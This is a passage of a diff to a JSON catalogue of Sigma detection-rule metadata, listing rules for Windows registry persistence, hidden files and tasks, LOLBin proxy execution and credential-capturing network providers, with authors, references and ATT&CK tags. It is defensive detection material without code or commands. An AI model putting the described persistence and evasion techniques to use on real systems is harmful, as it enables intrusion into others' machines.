- "author": "Andreas Hunkeler (@Karneades)",
- "creation_date": "2021/11/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_file_association_exefile.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/mrd0x/status/1461041276514623491",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff",
- "value": "New File Association Using Exefile"
- },
- {
- "description": "Detects persistence using GlobalFlags in image file execution options",
- "meta": {
- "author": "Karneades, Jonhnathan Ribeiro",
- "creation_date": "2018/04/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_globalflags_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.persistence",
- "attack.defense_evasion",
- "attack.t1546.012",
- "car.2013-01-002"
- ]
- },
- "uuid": "36803969-5421-41ec-b92f-8500f79c23b0",
- "value": "GlobalFlags Registry Persistence Mechanisms"
- },
- {
- "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "This value is not set by default but could be rarly used by administrators"
- ],
- "filename": 
"registry_set_hangs_debugger_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/wer_debugger.html",
- "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498",
- "value": "Add Debugger Entry To Hangs Key For Persistence"
- },
- {
- "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_hhctrl_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/hhctrl.html",
- "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1",
- "value": "Persistence Via Hhctrl.ocx"
- },
- {
- "description": "Hides the file extension through modification of the registry",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/22",
- "falsepositive": [
- "Administrative scripts"
- ],
- "filename": "registry_set_hidden_extention.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
- 
"https://unit42.paloaltonetworks.com/ransomware-families/",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1137"
- ]
- },
- "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2",
- "value": "Registry Modification to Hidden File Extension"
- },
- {
- "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/04/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_hide_file.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.001"
- ]
- },
- "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42",
- "value": "Modification of Explorer Hidden Keys"
- },
- {
- "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/03/18",
- "falsepositive": [
- "Legitimate admin script"
- ],
- "filename": "registry_set_hide_function_user.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6",
- "value": "Registry Hide Function from User"
- },
- {
- "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/26",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562"
- ]
- },
- "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61",
- "value": "Hide Schedule Task Via Index Value Tamper"
- },
- {
- "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_ie_persistence.yml",
- "level": "low",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3",
- "value": "Modification of IE Registry Settings"
- },
- {
- "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Legitimate registration of IFilters by the OS or software"
- ],
- "filename": "registry_set_ifilter_persistence.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/ifilters.html",
- "https://twitter.com/0gtweet/status/1468548924600459267",
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b",
- "value": "Register New IFiltre For Persistence"
- },
- {
- "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/04/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_install_root_or_ca_certificat.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store",
- "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ]
- },
- "uuid": "d223b46b-5621-4037-88fe-fda32eead684",
- "value": "New Root or CA or AuthRoot Certificate to Store"
- },
- {
- "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n",
+ "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.",
 "meta": {
 "author": "frack113",
 "creation_date": "2022/05/28",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml",
- "level": "high",
- "logsource.category": "registry_set",
+ "filename": "proc_creation_win_lolbin_pubprn.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"
+ "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml"
 ],
 "tags": [
- "attack.command_and_control",
- "attack.t1105"
+ "attack.defense_evasion",
+ "attack.t1216.001"
 ]
 },
- "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d",
- "value": "Lolbas 
OneDriveStandaloneUpdater.exe Proxy Download"
+ "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da",
+ "value": "Pubprn.vbs Proxy Execution"
 },
 {
- "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n",
+ "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity",
 "meta": {
 "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
+ "creation_date": "2022/09/27",
 "falsepositive": [
- "Unlikely"
+ "Unknown"
 ],
- "filename": "registry_set_lsa_extension_persistence.yml",
+ "filename": "proc_creation_win_imaging_devices_unusual_parents.yml",
 "level": "high",
- "logsource.category": "registry_set",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/lsaaextension.html",
- "https://twitter.com/0gtweet/status/1476286368385019906",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml"
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml"
 ],
 "tags": [
- "attack.persistence"
+ "attack.defense_evasion",
+ "attack.execution"
 ]
 },
- "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36",
- "value": "Persistence Via LSA Extensions"
+ "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99",
+ "value": "ImagingDevices Unusual Parent/Child Processes"
 },
 {
- "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
+ "description": "Execute commands and binaries from the context 
of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.",
 "meta": {
- "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2017/11/10",
- "falsepositive": "No established falsepositives",
- "filename": "registry_set_mal_adwind.yml",
- "level": "high",
- "logsource.category": "registry_set",
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/14",
+ "falsepositive": [
+ "Legitimate use via a batch script or by an administrator."
+ ],
+ "filename": "proc_creation_win_lolbin_forfiles.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml"
+ "https://pentestlab.blog/2020/07/06/indirect-command-execution/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"
 ],
 "tags": [
 "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
+ "attack.t1059"
 ]
 },
- "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5",
- "value": "Adwind RAT / JRAT - Registry"
+ "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b",
+ "value": "Use of Forfiles For Execution"
 },
 {
- "description": "Attempts to detect system changes made by Blue Mockingbird",
+ "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)",
 "meta": {
- "author": "Trent Liffick (@tliffick)",
- "creation_date": "2020/05/14",
+ "author": "Nasreddine Bencherchali",
+ "creation_date": 
"2022/07/25",
 "falsepositive": [
- "Unknown"
+ "Other legitimate \"Windows Terminal\" profiles"
 ],
- "filename": "registry_set_mal_blue_mockingbird.yml",
- "level": "high",
- "logsource.category": "registry_set",
+ "filename": "proc_creation_win_windows_terminal_susp_children.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml"
+ "https://persistence-info.github.io/Data/windowsterminalprofile.html",
+ "https://twitter.com/nas_bench/status/1550836225652686848",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"
 ],
 "tags": [
 "attack.execution",
- "attack.t1112",
- "attack.t1047"
- ]
- },
- "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27",
- "value": "Blue Mockingbird - Registry"
- },
- {
- "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way"
- ],
- "filename": "registry_set_mpnotify_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/mpnotify.html",
- "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml"
- ],
- "tags": [
 "attack.persistence"
 ]
 },
- "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3",
- "value": "Persistence Via Mpnotify"
+ "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48",
+ "value": "Suspicious WindowsTerminal Child Processes"
 },
 {
- "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n",
+ "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"",
 "meta": {
 "author": "frack113",
- "creation_date": "2022/11/18",
+ "creation_date": "2022/12/29",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "registry_set_net_cli_ngenassemblyusagelog.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "28036918-04d3-423d-91c0-55ecf99fb892",
- "value": "NET NGenAssemblyUsageLog Registry Key Tamper"
- },
- {
- "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "creation_date": "2020/05/02",
- "falsepositive": [
- "This rule is to explore new applications on an endpoint. False positives depends on the organization.",
- "Newly setup system.",
- "Legitimate installation of new application." 
- ],
- "filename": "registry_set_new_application_appcompat.yml",
- "level": "informational",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/1",
- "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204.002"
- ]
- },
- "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d",
- "value": "New Application in AppCompat"
- },
- {
- "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/23",
- "falsepositive": [
- "Other legitimate network providers used and not filtred in this rule"
- ],
- "filename": "registry_set_new_network_provider.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003"
- ]
- },
- "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701",
- "value": "New Network Provider - Registry"
- },
- {
- "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/02/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_office_enable_dde.yml",
+ "filename": "proc_creation_win_lolbin_unregmp2.yml",
 "level": 
"medium",
- "logsource.category": "registry_set",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1559.002"
- ]
- },
- "uuid": "63647769-326d-4dde-a419-b925cc0caf42",
- "value": "Enable Microsoft Dynamic Data Exchange"
- },
- {
- "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)",
- "meta": {
- "author": "Trent Liffick (@tliffick)",
- "creation_date": "2020/05/22",
- "falsepositive": [
- "Valid Macros and/or internal documents"
- ],
- "filename": "registry_set_office_security.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/inversecos/status/1494174785621819397",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd",
- "value": "Office Security Settings Changed"
- },
- {
- "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/10",
- "falsepositive": [
- "Legitimate Addin Installation"
- ],
- "filename": "registry_set_office_vsto_persistence.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- 
"https://twitter.com/_vivami/status/1347925307643355138",
- "https://vanmieghem.io/stealth-outlook-persistence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml"
- ],
- "tags": [
- "attack.t1137.006",
- "attack.persistence"
- ]
- },
- "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685",
- "value": "Stealthy VSTO Persistence"
- },
- {
- "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.",
- "meta": {
- "author": "@ScoubiMtl",
- "creation_date": "2021/04/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_outlook_c2_registry_key.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.command_and_control",
- "attack.t1137",
- "attack.t1008",
- "attack.t1546"
- ]
- },
- "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd",
- "value": "Outlook C2 Registry Key"
- },
- {
- "description": "Detects the manipulation of persistent URLs which could execute malicious code",
- "meta": {
- "author": "Tobias Michalski",
- "creation_date": "2021/06/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_outlook_registry_todaypage.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml"
- ],
- "tags": [
- 
"attack.persistence",
- "attack.t1112"
- ]
- },
- "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1",
- "value": "Persistent Outlook Landing Today Pages"
- },
- {
- "description": "Detects the manipulation of persistent URLs which can be malicious",
- "meta": {
- "author": "Tobias Michalski",
- "creation_date": "2021/06/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_outlook_registry_webview.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
- "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1112"
- ]
- },
- "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76",
- "value": "Persistent Outlook Landing Pages"
- },
- {
- "description": "Change outlook email security settings",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/28",
- "falsepositive": [
- "Administrative scripts"
- ],
- "filename": "registry_set_outlook_security.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
- "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1137"
- ]
- },
- "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a",
- "value": "Change Outlook Security Setting in Registry"
- },
- {
- "description": 
"Detects potential persistence using Appx DebugPath",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/07/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_persistence_appx_debugger.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/",
- "https://github.com/rootm0s/WinPwnage",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.015"
- ]
- },
- "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae",
- "value": "Windows Registry Persistence DebugPath"
- },
- {
- "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_persistence_autodial_dll.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/",
- "https://persistence-info.github.io/Data/autodialdll.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3",
- "value": "Persistence Via AutodialDLL"
- },
- {
- "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/28",
- "falsepositive": [
- "Probable legitimate applications. 
If you find these please add them to an exclusion list"
- ],
- "filename": "registry_set_persistence_com_hijacking_susp_locations.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.015"
- ]
- },
- "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77",
- "value": "COM Hijacking For Persistence With Suspicious Locations"
- },
- {
- "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/09",
- "falsepositive": [
- "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for"
- ],
- "filename": "registry_set_persistence_mycomputer.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06",
- "value": "Persistence Via MyComputer Key and SubKeys"
- },
- {
- "description": "Detects potential COM object hijacking leveraging the COM Search Order",
- "meta": {
- "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien",
- "creation_date": "2020/04/14",
- "falsepositive": [
- "Some installed utilities (i.e. 
